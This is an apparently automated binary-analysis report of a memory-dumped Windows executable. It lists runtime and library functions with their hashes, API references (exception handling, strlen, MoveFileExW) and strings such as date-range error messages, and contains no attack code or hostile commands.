Opcode ID: 9fcc17a2efb21fe4a62e6467dab88e7836865d1b59f7e2a8ef40436d33972f08
Instruction ID: 49f1640896f940073c092bc6b2f89d8437ca88af67f99a62a044dc629989b585
Opcode Fuzzy Hash: 9fcc17a2efb21fe4a62e6467dab88e7836865d1b59f7e2a8ef40436d33972f08
Instruction Fuzzy Hash: D5F027719005449BD310AF1CD8067EAFBBCEF80720F1002AEF01193241D7F42A408794

Uniqueness

Uniqueness Score: -1.00%

Function 0056F23E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0056F243

Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B

_strlen.LIBCMT ref: 0056F265

Strings

Sun raster files (*.sr;*.ras), xrefs: 0056F259, 0056F25E, 0056F26C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Sun raster files (*.sr;*.ras)
API String ID: 1490583215-3889358345
Opcode ID: 9c51a5b4af37b541f79641d50cb08cc21f29ab82f6d4c99e8514a0fd358f972b
Instruction ID: dc07aefda2211b728f9a8b7e8070fca9346909eb2e966114edd574951cee3586
Opcode Fuzzy Hash: 9c51a5b4af37b541f79641d50cb08cc21f29ab82f6d4c99e8514a0fd358f972b
Instruction Fuzzy Hash: 0FE0E572D005149BD314AF5CE806AAEFBBCEF80720F10036FB01493281EBF41F408698

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040FE65
___swprintf_l.LIBCMT ref: 0040FE7F

Strings

Unknown error (%d), xrefs: 0040FE77

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog___swprintf_l
String ID: Unknown error (%d)
API String ID: 1425508385-1458610041
Opcode ID: edba089c2b807424d224fdd4fb0a2172ccc4b940d006e580d7c7ec76caea756e
Instruction ID: 4d22439f8911486fab8804a4bf18c4d762e21f76f372b8527ffb3e4248539f38
Opcode Fuzzy Hash: edba089c2b807424d224fdd4fb0a2172ccc4b940d006e580d7c7ec76caea756e
Instruction Fuzzy Hash: 4CF03971E4020CABEF10EFA4D846BEEBB79FB04318F004559F804A7681D77A9A94CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0042203B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422040

Part of subcall function 00421CD5: __EH_prolog.LIBCMT ref: 00421CDA

ctype.LIBCPMT ref: 00422063

Part of subcall function 00422171: __Getctype.LIBCPMT ref: 00422180
Part of subcall function 00422171: __Getcvt.LIBCPMT ref: 00422192

Strings

)$B, xrefs: 0042205D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$GetctypeGetcvtctype
String ID: )$B
API String ID: 1156925297-2716296551
Opcode ID: e49bd1c6b043eaaaa2cb7041446f786825dba6f45bdb0a9862da6b31754de0b5
Instruction ID: ceb239b2b081795ce35e1f6e991e4cc499f01f049466f28294942c9fbd811253
Opcode Fuzzy Hash: e49bd1c6b043eaaaa2cb7041446f786825dba6f45bdb0a9862da6b31754de0b5
Instruction Fuzzy Hash: 88E09275A00125ABCB24AF59A4016DEBF75EB04330F00424EB81552390C7740B109794

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD28, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CD2D

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CD7B

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

oA, xrefs: 0041CD59

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: oA
API String ID: 1193697898-3454950961
Opcode ID: c06ac42c1d491ebcc1b3b1f65d7d3f80bc11a3547fe56a47aa00834eb557193c
Instruction ID: 119c02bac427e72d558e26fda59d2ad4a3407241e3f60de2107d5731b82a14ba
Opcode Fuzzy Hash: c06ac42c1d491ebcc1b3b1f65d7d3f80bc11a3547fe56a47aa00834eb557193c
Instruction Fuzzy Hash: 47F01CB1C10258AACF04EFB5D95AACDBBB1BB15308F10826CE01136191D7B84749CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CD86

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CDD4

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

A, xrefs: 0041CDB2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: A
API String ID: 1193697898-2078354741
Opcode ID: 6ae351546ae56b00c6e08e1bc129a1f1e847e102062b59cf7a43453c109a8ed1
Instruction ID: dc43e170dc784e82f31ed2a172e9defc8717ef828ae860496d2aa58661223cc5
Opcode Fuzzy Hash: 6ae351546ae56b00c6e08e1bc129a1f1e847e102062b59cf7a43453c109a8ed1
Instruction Fuzzy Hash: ADF01CB1C1425CABCF04EFA5EA5AACCBBB0BB14308F10827CE02176181D7B8064CCB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CEE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CEE5

Part of subcall function 0040F5B6: std::exception::exception.LIBCMT ref: 0040F5D8

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CF33

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

A, xrefs: 0041CF11

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
String ID: A
API String ID: 1371192639-2078354741
Opcode ID: 48b02328276ee166075c531499844fda047622b403101760e9a7fa2b561cfa96
Instruction ID: ea73f2537b7ebf2a166d428d8aa5ea2365e2beb5f4de7cc0bfe36b190c0b6ad8
Opcode Fuzzy Hash: 48b02328276ee166075c531499844fda047622b403101760e9a7fa2b561cfa96
Instruction Fuzzy Hash: 77F01CB1C10258EACF04EFA5EA59ACDBBB0BF14308F10827DE11176281D7B8474CCB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CF3E

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CF8C

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

XA, xrefs: 0041CF6A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: XA
API String ID: 1193697898-3740220071
Opcode ID: d8f4b080f76f92fc3290fbf6dffa941d04b4b979e5d7a299af69e98aa69effa9
Instruction ID: 7f226d57c6e37e66f5d745da70c5eee59297d2e9959cc29ae7faa6f6602aec87
Opcode Fuzzy Hash: d8f4b080f76f92fc3290fbf6dffa941d04b4b979e5d7a299af69e98aa69effa9
Instruction Fuzzy Hash: 45F0FEB1C15358AACF04EFA5DA596CDBA70AF24304F10426DE41136191D7B84648CB55

Uniqueness

Uniqueness Score: -1.00%

Function 005C7580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000000,00000000,00000003), ref: 005C7596
GetLastError.KERNEL32 ref: 005C75A0

Strings

boost::filesystem::rename, xrefs: 005C75AA

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileLastMove
String ID: boost::filesystem::rename
API String ID: 55378915-2110873845
Opcode ID: 589d33049c148d5c81d566fd07251f64cf4ce2eddca793b29970fc03c12a39e2
Instruction ID: 49b56ccc2765265f487eac50408b3522eb4018bcdb085a3b6a3eb0bc800958ea
Opcode Fuzzy Hash: 589d33049c148d5c81d566fd07251f64cf4ce2eddca793b29970fc03c12a39e2
Instruction Fuzzy Hash: 2EE01A75A08742AFCB05ABE19C0DE2A7AAABB94344F400C5CB14681461D735C5149B16

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8FD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041D902

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041D950

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

_A, xrefs: 0041D92E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: _A
API String ID: 1193697898-1825564343
Opcode ID: a4a1601cdf466c016bf09dd61f8cd8a2960ae75e11a18a899dee380d6bf75e12
Instruction ID: 27193058b268341b5eb12416e86060d365fcfa90958a838545e5a66ebbab2a55
Opcode Fuzzy Hash: a4a1601cdf466c016bf09dd61f8cd8a2960ae75e11a18a899dee380d6bf75e12
Instruction Fuzzy Hash: BDF01CB1C11258AACF08EFA6DD596CDBFB1BF14348F10826CE41176291D7B80748CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8A4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041D8A9

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 0041D8F7

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

A, xrefs: 0041D8D5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: A
API String ID: 1193697898-2078354741
Opcode ID: cbee3d4c62ab97b7f3ba41805294a30909d7e465d5d2b8226eecccb1ca422852
Instruction ID: c0c8b6ce278fd9a35aeffb203b39db286920b073db57a1f1258ac355354b574d
Opcode Fuzzy Hash: cbee3d4c62ab97b7f3ba41805294a30909d7e465d5d2b8226eecccb1ca422852
Instruction Fuzzy Hash: 46F01CF1C2025CEACF04EBB5D9596CCBBB4BF14358F20826DE01176191D7F80648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1F6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041C1FB

Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Part of subcall function 0041D8A4: __EH_prolog.LIBCMT ref: 0041D8A9
Part of subcall function 0041D8A4: __CxxThrowException@8.LIBVCRUNTIME ref: 0041D8F7

Strings

2hA, xrefs: 0041C22D
Month number is out of range 1..12, xrefs: 0041C203

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateException@8Throwstd::_
String ID: 2hA$Month number is out of range 1..12
API String ID: 767510344-483880390
Opcode ID: 377650b532c5a5941179669ae4e285718ef405bc4cedb8ee36969b5885ad3b32
Instruction ID: 0f917c70bb08959ae5853aab361f5efad75bf10ab9a7e7d5d1e8aab95e5bcd7a
Opcode Fuzzy Hash: 377650b532c5a5941179669ae4e285718ef405bc4cedb8ee36969b5885ad3b32
Instruction Fuzzy Hash: BBE0EDB1850218AADB04FBA5D95ABEDBB74AF14308F50442DA201660D2DB781789C795

Uniqueness

Uniqueness Score: -1.00%

Function 0041C244, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041C249

Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Part of subcall function 0041D8FD: __EH_prolog.LIBCMT ref: 0041D902
Part of subcall function 0041D8FD: __CxxThrowException@8.LIBVCRUNTIME ref: 0041D950

Strings

2hA, xrefs: 0041C27B
Year is out of valid range: 1400..9999, xrefs: 0041C251

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateException@8Throwstd::_
String ID: 2hA$Year is out of valid range: 1400..9999
API String ID: 767510344-3686570063
Opcode ID: 40f81829c3d84668ff37c444cd9b2c4ee4788cb342b529b5ccb3caf6e263b7bb
Instruction ID: 95bf30f58c7a654497ed0b246a977fca473f008e9f7b1f07bbac91a704a442df
Opcode Fuzzy Hash: 40f81829c3d84668ff37c444cd9b2c4ee4788cb342b529b5ccb3caf6e263b7bb
Instruction Fuzzy Hash: 1BE0EDB1851218AADB08FBA5D96ABEDBBB4AF14708F50442CA201660D2DB781789C795

Uniqueness

Uniqueness Score: -1.00%

Function 0041C292, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041C297

Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Part of subcall function 0041CF39: __EH_prolog.LIBCMT ref: 0041CF3E
Part of subcall function 0041CF39: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF8C

Strings

2hA, xrefs: 0041C2C9
Day of month value is out of range 1..31, xrefs: 0041C29F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateException@8Throwstd::_
String ID: 2hA$Day of month value is out of range 1..31
API String ID: 767510344-3036547170
Opcode ID: 253387ac6032946975d367c3ee22018720ee5fe47d64f6d594edec9b8fbdf474
Instruction ID: 9057a6416d9578c5938dccb17733000f678ebf9e0ec962c15a0ce63da9c8cc16
Opcode Fuzzy Hash: 253387ac6032946975d367c3ee22018720ee5fe47d64f6d594edec9b8fbdf474
Instruction Fuzzy Hash: 20E0EDB1850218AADB04FBA1DA5ABEDBA74AF14708F10442CA201660C2DB781B89C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040404B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00404052

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040405A
1.33, xrefs: 0040404C, 00404059

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 435bff0e8e6766e45d3ee7df8b530c4ec73c6e5362da47df5d9e505cac8ed6f3
Instruction ID: 334c7c6f38cec32f5cab1c73fc81847bbe7a2959a87ff75f0a31fc86d0c003eb
Opcode Fuzzy Hash: 435bff0e8e6766e45d3ee7df8b530c4ec73c6e5362da47df5d9e505cac8ed6f3
Instruction Fuzzy Hash: 7EC04C1799D53029258437583847CEF828E8E66721351067FB520652816D891E8703BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2EF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040A2F6

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040A2FE
1.33, xrefs: 0040A2F0, 0040A2F5, 0040A2FD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 06d8f584d7d621fd37bcc43bf6c051e1462b172af9fd0d5a540d6c26949c4553
Instruction ID: 23c6a62fbf7070ae528f83094da091275c386195dfa0e140a59369addebc7ea2
Opcode Fuzzy Hash: 06d8f584d7d621fd37bcc43bf6c051e1462b172af9fd0d5a540d6c26949c4553
Instruction Fuzzy Hash: FFC04C5299D5302D2588326C7847CEF828ECD66721355067FB51065181AD891DC202FD

Uniqueness

Uniqueness Score: -1.00%

Function 004022AB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004022B2

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 004022AC, 004022B9
1.33, xrefs: 004022BA

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: cc415a982060184ad12c63005c54cbc3c750980d6376de9ff80cc262e33692bb
Instruction ID: fee67894176f2cffeb8ea5941aed12752fc1ffc9e9098a0d1ef10b56acc5fa81
Opcode Fuzzy Hash: cc415a982060184ad12c63005c54cbc3c750980d6376de9ff80cc262e33692bb
Instruction Fuzzy Hash: 20C04C22A9D53029298432583C47CEF418E9D66321355067FF91165282AD891DC302FE

Uniqueness

Uniqueness Score: -1.00%

Function 00408778, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040877F

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 00408779, 0040877E, 00408786
1.33, xrefs: 00408787

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 30bc4a5b28311e017de6d8d288be2dd1bbaf5e713423f8377568a55584e200a5
Instruction ID: e347847c8f2c0414e34e6aee7e5bda58f58ac38cb8e68bc3fd27117e74f58ece
Opcode Fuzzy Hash: 30bc4a5b28311e017de6d8d288be2dd1bbaf5e713423f8377568a55584e200a5
Instruction Fuzzy Hash: A9C08C1289D0306A208432183C03CEF018E8D62320321027FF410A11816D881CC202BD

Uniqueness

Uniqueness Score: -1.00%

Function 004049C3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004049CA

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 004049C4, 004049C9, 004049D1
1.33, xrefs: 004049D2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: ecf70d84eda096a759bf94cceea38a2690781775dc874dad72cdc122b84e2020
Instruction ID: 255a4bd6693b74cd7b9425e0dcb584601c61693fd328d844ace45f402c33b612
Opcode Fuzzy Hash: ecf70d84eda096a759bf94cceea38a2690781775dc874dad72cdc122b84e2020
Instruction Fuzzy Hash: 51C04C13D9D53429258432583C47CEF829E8D6672135507BFB950A52856D895DC602BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402B76, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00402B7D

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 00402B85
1.33, xrefs: 00402B77, 00402B7C, 00402B84

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: c974e923211bbd26f1d735e25be4dc080392cf8d6fdeab958b119300d736be9c
Instruction ID: a4d21a1c80503b4bc04d1b628bdad13e859761bf5fe91ec9a87aadef61c6b742
Opcode Fuzzy Hash: c974e923211bbd26f1d735e25be4dc080392cf8d6fdeab958b119300d736be9c
Instruction Fuzzy Hash: F3C04C22A9D53429258932697847CEF41CECD66321355077FB910662826D892DC702BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB27, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040CB2E

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040CB36
1.33, xrefs: 0040CB28, 0040CB2D, 0040CB35

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 1f5a1657e9133a470cdf0a84c9f0faec14882fbe0e4ecfde0135a6d86f73f57c
Instruction ID: d4eb6d7883f2a89999d2db4ec6593da39b7f49c092d09c87e7fcf1fe08694c2b
Opcode Fuzzy Hash: 1f5a1657e9133a470cdf0a84c9f0faec14882fbe0e4ecfde0135a6d86f73f57c
Instruction Fuzzy Hash: C8C04C5699E53029258432593847CEF418E8D66721351077FF510652816D995DC202BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABBA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040ABC1

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040ABC9
1.33, xrefs: 0040ABBB, 0040ABC0, 0040ABC8

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 7f836699f3fef5fc78d50bbd98860011187e164de8a55275577d37cb97f59b93
Instruction ID: 23f499729a52fb6bfcbaee7a70b6625b19a32be85a4aefd9d6972a6fceb7ea7e
Opcode Fuzzy Hash: 7f836699f3fef5fc78d50bbd98860011187e164de8a55275577d37cb97f59b93
Instruction Fuzzy Hash: CFC04CA299E5312A258432687847CEF818E8D66721351067FB510651816D891DC202BD

Uniqueness

Uniqueness Score: -1.00%

Function 00409043, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040904A

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 00409052
1.33, xrefs: 00409044, 00409051

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 7b41efcc27c80d05a5e53d4a3d4c2e3e4a09ea8caee40a0aba34fd0fe58d02cf
Instruction ID: c59f49c02157581852eba3ae34fc1396fad1995ca9a2f19d5f46631a84fb8e0e
Opcode Fuzzy Hash: 7b41efcc27c80d05a5e53d4a3d4c2e3e4a09ea8caee40a0aba34fd0fe58d02cf
Instruction Fuzzy Hash: F8C08C228AD03069208432283C47CEF018E8E63321312027FF800611816C881D8203FD

Uniqueness

Uniqueness Score: -1.00%

Function 004052B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004052BC

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 004052C4
1.33, xrefs: 004052B6, 004052BB, 004052C3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 131c851e3965befbe7a54defdeb9b703cf5027e29c57b09cf33ad14758fe9539
Instruction ID: 93dff822f8a379dc5aa1a8971b0f28f38898b86cba4d6c536c42691786c614d4
Opcode Fuzzy Hash: 131c851e3965befbe7a54defdeb9b703cf5027e29c57b09cf33ad14758fe9539
Instruction Fuzzy Hash: 69C04C1699D53069258432583C47CEF418E9D66721351077FF510A61826D896D8302BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040D3F9

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040D401
1.33, xrefs: 0040D3F3, 0040D3F8, 0040D400

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 324e1026af9e79237e0e7eea3f96b91c1dd3341c56359a058f27c37d51c9efa9
Instruction ID: 8d04647860acef6f2a699f50dc2e15738198c707edcd4c76c6512e49d73221a4
Opcode Fuzzy Hash: 324e1026af9e79237e0e7eea3f96b91c1dd3341c56359a058f27c37d51c9efa9
Instruction Fuzzy Hash: B8C04C169AD53039259432683847CEF418E8D66721351067FB910661816D896D8202BD

Uniqueness

Uniqueness Score: -1.00%

Function 004034E9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004034F0

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 004034EA, 004034EF, 004034F7
1.33, xrefs: 004034F8

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 8d43e9594d4889ca0e939b798151f664cf7d9a24ee1947e4d29ecee6619ad95d
Instruction ID: f2349b061beca73a8e9bff4bd078e2673f3dba727cf1baefd91fd6199e3ef5ae
Opcode Fuzzy Hash: 8d43e9594d4889ca0e939b798151f664cf7d9a24ee1947e4d29ecee6619ad95d
Instruction Fuzzy Hash: C7C04C269AD53029258832583847CEF419E8D66721351067FB510652826D891D8302BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B485, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040B48C

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040B486, 0040B48B, 0040B493
1.33, xrefs: 0040B494

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 49f6be0ba61488d1ff33cd1374cf8542d7321af9f91e9ce5267df88e74461777
Instruction ID: da6d600d92dce1997e274023e91c7939c5b56fe1d1b8aff33866751f64e583cf
Opcode Fuzzy Hash: 49f6be0ba61488d1ff33cd1374cf8542d7321af9f91e9ce5267df88e74461777
Instruction Fuzzy Hash: D3C04C5699D5306A2585329D3847CEF418E8E66721352067FB511A52816D991D8202BD

Uniqueness

Uniqueness Score: -1.00%

Function 004018A5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004018AC

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 004018B4
1.33, xrefs: 004018A6, 004018B3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 65c58b6549c2dd4f07d65ae6d5fa27cc651d04bb44829edc43094901256dd37b
Instruction ID: c7825c53cdfd4f12779c3fe24959c311fcfe7353446e4b5160739715df8d938d
Opcode Fuzzy Hash: 65c58b6549c2dd4f07d65ae6d5fa27cc651d04bb44829edc43094901256dd37b
